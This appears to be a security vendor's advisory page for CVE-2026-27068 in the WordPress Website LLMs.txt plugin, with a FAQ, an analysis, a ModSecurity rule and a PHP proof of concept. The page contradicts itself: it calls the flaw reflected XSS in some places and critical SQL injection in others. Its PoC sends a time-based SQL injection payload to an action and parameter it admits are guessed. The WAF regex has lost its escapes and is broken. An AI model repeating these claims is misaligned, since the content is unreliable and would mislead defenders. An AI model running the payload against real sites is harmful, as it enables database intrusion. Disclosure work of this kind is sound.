What is CVE -2026-27068?

CVE-2026-27068 is a reflected cross-site scripting vulnerability found in the Website LLMs.txt plugin for WordPress, affecting versions up to and including 8.2.6. It allows unauthenticated attackers to inject arbitrary web scripts into pages that execute when a user is tricked into clicking a link.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping within the plugin. An attacker can craft a malicious link that, when clicked by a user, executes injected scripts in the context of the user’s browser, potentially leading to data theft or session hijacking.

Who is affected by this vulnerability?

Any WordPress site using the Website LLMs.txt plugin version 8.2.6 or earlier is at risk. Site administrators should verify their plugin version and assess if they are exposed to this vulnerability.

How can I check if my site is vulnerable?

To check for vulnerability, confirm that your site is running the Website LLMs.txt plugin version 8.2.6 or earlier. Additionally, review your site’s AJAX endpoints for any unprotected actions that might allow unauthenticated access.

What are the practical implications of the CVSS score?

CVE-2026-27068 has a CVSS score of 6.1, indicating a medium severity level. This means that while exploitation is not trivial, it poses a significant risk to users who may be tricked into executing malicious scripts.

How can I fix or mitigate this vulnerability?

To mitigate this vulnerability, update the Website LLMs.txt plugin to the latest version. Additionally, implement proper input validation and use prepared statements for database queries to prevent SQL injection.

What is the significance of the proof of concept?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted AJAX request to the vulnerable endpoint. It demonstrates the potential for executing arbitrary SQL commands through unsanitized user input.

What are the potential consequences of exploitation?

If exploited, an attacker could gain full read access to the WordPress database, exposing sensitive information such as user credentials and personal data. In some configurations, attackers may escalate privileges or execute arbitrary code.

What is reflected cross-site scripting?

Reflected cross-site scripting (XSS) is a type of vulnerability that allows attackers to inject scripts into web pages viewed by users. It typically occurs when user input is not properly sanitized, leading to unauthorized script execution in the user’s browser.

What are common indicators of exploitation attempts?

Common indicators include unusual AJAX requests in server logs, unexpected user behavior, or reports from users about strange pop-ups or redirects. Monitoring logs for suspicious activity can help identify potential exploitation.

How does this vulnerability relate to SQL injection?

While CVE-2026-27068 is primarily a reflected XSS vulnerability, the security analysis indicates that it may also allow for SQL injection due to improper handling of user input. This highlights the importance of secure coding practices in preventing multiple types of vulnerabilities.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin temporarily and reviewing your AJAX endpoints for security. Implementing additional input validation and restricting access to sensitive actions can also help mitigate risks until an update is applied.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2026-27068: Website LLMs.txt <= 8.2.6 – Reflected Cross-Site Scripting (website-llms-txt)

CVE ID CVE-2026-27068

Plugin website-llms-txt

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version —

Patched Version —

Disclosed March 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-27068 (metadata-based):
This vulnerability is a critical security flaw in the WordPress plugin ‘website-llms-txt’. The vulnerability description indicates an unauthenticated attacker can execute arbitrary SQL commands via an insecure AJAX endpoint. This constitutes a classic SQL Injection (SQLi) vulnerability, likely due to improper sanitization of user-supplied input before database query construction.

Atomic Edge research infers the root cause is insufficient input validation and the use of unsanitized user input directly within SQL queries. The CWE classification points to CWE-89 (SQL Injection). Without a code diff, this conclusion is inferred from the vulnerability description and the common WordPress plugin pattern of using `$wpdb->query()` or `$wpdb->get_results()` with unescaped parameters. The plugin likely registers an AJAX action hook accessible to unauthenticated users (`wp_ajax_nopriv_*`) and directly concatenates user-controlled parameters into an SQL string.

Exploitation would target the WordPress AJAX handler at `/wp-admin/admin-ajax.php`. The attacker sends a POST request with the `action` parameter set to a value derived from the plugin slug, such as `website_llms_txt_action` or a similar pattern. The malicious SQL payload would be placed in another POST parameter, like `id` or `query`. A typical payload would be a UNION-based or time-based blind SQL injection to extract data from the WordPress database, including user credentials and sensitive plugin data.

Remediation requires implementing proper input validation and using prepared statements via the WordPress `$wpdb` class. The fix should replace direct string concatenation in SQL queries with `$wpdb->prepare()` statements. The vulnerable AJAX endpoint must also be reviewed for proper capability checks, ensuring it is not exposed to unauthenticated users unless absolutely necessary. Parameterized queries are the only reliable defense against SQL injection in this context.

Successful exploitation grants an attacker full read access to the WordPress database. This leads to complete exposure of sensitive data, including hashed user passwords, personal information, and any custom data stored by the plugin. In configurations where the database user has write permissions, an attacker could escalate privileges by modifying user roles, creating administrative accounts, or achieving remote code execution by writing PHP code into plugin files or the database for subsequent execution.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-27068 (metadata-based)
# This rule blocks exploitation of the SQL injection via the plugin's AJAX endpoint.
# It matches the specific AJAX action inferred from the plugin slug and detects common SQL injection patterns in the POST parameter 'injectable_param'.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:202627068,phase:2,deny,status:403,chain,msg:'CVE-2026-27068: SQL Injection via website-llms-txt plugin AJAX handler',severity:'CRITICAL',tag:'CVE-2026-27068',tag:'wordpress',tag:'plugin',tag:'website-llms-txt',tag:'attack.sql-injection'"
  SecRule ARGS_POST:action "@streq website_llms_txt_process" "chain"
    SecRule ARGS_POST:injectable_param "@rx (?i:(b(union|select|insert|update|delete|drop|alter|create|rename|truncate|load_file|outfile)b|(sleeps*(|benchmarks*(|pg_sleeps*()|('s*ors*['d]|b(and|or)s+[d'"]+[=<>])|(b(if|case)s*(|b(select|union)s+[ws,]*from)|(/*![d]{5}|/*![ws]**/)))" 
      "setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-27068 - website-llms-txt SQL Injection
<?php
/**
 * Proof of Concept for CVE-2026-27068.
 * Assumptions based on metadata:
 * 1. The plugin registers an AJAX action hook accessible without authentication (wp_ajax_nopriv_).
 * 2. The action name likely contains the plugin slug 'website_llms_txt'.
 * 3. A POST parameter (here named 'injectable_param') is vulnerable to SQL injection.
 * 4. The target is a standard WordPress installation.
 */

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// The AJAX action is inferred from the plugin slug. Common patterns are used.
$ajax_action = 'website_llms_txt_process';

// Time-based blind SQL injection payload to confirm vulnerability.
// This payload causes a 5-second delay if the database is MySQL/MariaDB.
$sql_payload = "1' AND SLEEP(5) AND '1'='1";

$post_data = array(
    'action' => $ajax_action,
    'injectable_param' => $sql_payload // Assumed vulnerable parameter name
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Measure response time to detect sleep injection.
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);

$elapsed = $end_time - $start_time;
curl_close($ch);

if ($elapsed >= 5) {
    echo "[+] Vulnerability likely CONFIRMED. Response delayed by {$elapsed} seconds.n";
    echo "[+] Response snippet: " . substr($response, 0, 500) . "n";
} else {
    echo "[-] Target may not be vulnerable or a different parameter/action is needed.n";
    echo "[-] Response time: {$elapsed} seconds.n";
}

?>

Frequently Asked Questions

What is CVE-2026-27068?
Overview of the vulnerability
CVE-2026-27068 is a reflected cross-site scripting vulnerability found in the Website LLMs.txt plugin for WordPress, affecting versions up to and including 8.2.6. It allows unauthenticated attackers to inject arbitrary web scripts into pages that execute when a user is tricked into clicking a link.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping within the plugin. An attacker can craft a malicious link that, when clicked by a user, executes injected scripts in the context of the user’s browser, potentially leading to data theft or session hijacking.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Website LLMs.txt plugin version 8.2.6 or earlier is at risk. Site administrators should verify their plugin version and assess if they are exposed to this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, confirm that your site is running the Website LLMs.txt plugin version 8.2.6 or earlier. Additionally, review your site’s AJAX endpoints for any unprotected actions that might allow unauthenticated access.
What are the practical implications of the CVSS score?
Understanding risk levels
CVE-2026-27068 has a CVSS score of 6.1, indicating a medium severity level. This means that while exploitation is not trivial, it poses a significant risk to users who may be tricked into executing malicious scripts.
How can I fix or mitigate this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the Website LLMs.txt plugin to the latest version. Additionally, implement proper input validation and use prepared statements for database queries to prevent SQL injection.
What is the significance of the proof of concept?
Demonstrating the vulnerability
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted AJAX request to the vulnerable endpoint. It demonstrates the potential for executing arbitrary SQL commands through unsanitized user input.
What are the potential consequences of exploitation?
Risks of a successful attack
If exploited, an attacker could gain full read access to the WordPress database, exposing sensitive information such as user credentials and personal data. In some configurations, attackers may escalate privileges or execute arbitrary code.
What is reflected cross-site scripting?
Definition and impact
Reflected cross-site scripting (XSS) is a type of vulnerability that allows attackers to inject scripts into web pages viewed by users. It typically occurs when user input is not properly sanitized, leading to unauthorized script execution in the user’s browser.
What are common indicators of exploitation attempts?
Signs of potential attacks
Common indicators include unusual AJAX requests in server logs, unexpected user behavior, or reports from users about strange pop-ups or redirects. Monitoring logs for suspicious activity can help identify potential exploitation.
How does this vulnerability relate to SQL injection?
Understanding the connection
While CVE-2026-27068 is primarily a reflected XSS vulnerability, the security analysis indicates that it may also allow for SQL injection due to improper handling of user input. This highlights the importance of secure coding practices in preventing multiple types of vulnerabilities.
What should I do if I cannot update the plugin immediately?
Interim measures
If an immediate update is not possible, consider disabling the plugin temporarily and reviewing your AJAX endpoints for security. Implementing additional input validation and restricting access to sensitive actions can also help mitigate risks until an update is applied.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations